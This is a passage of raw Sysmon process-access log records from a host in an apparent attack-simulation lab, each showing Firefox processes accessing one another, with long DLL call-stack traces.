Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.154{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 
10341000x800000000000000018495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.154{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.154{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.123{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.076{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc 10341000x800000000000000018511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla 
Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000018510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla 
Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000018509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla 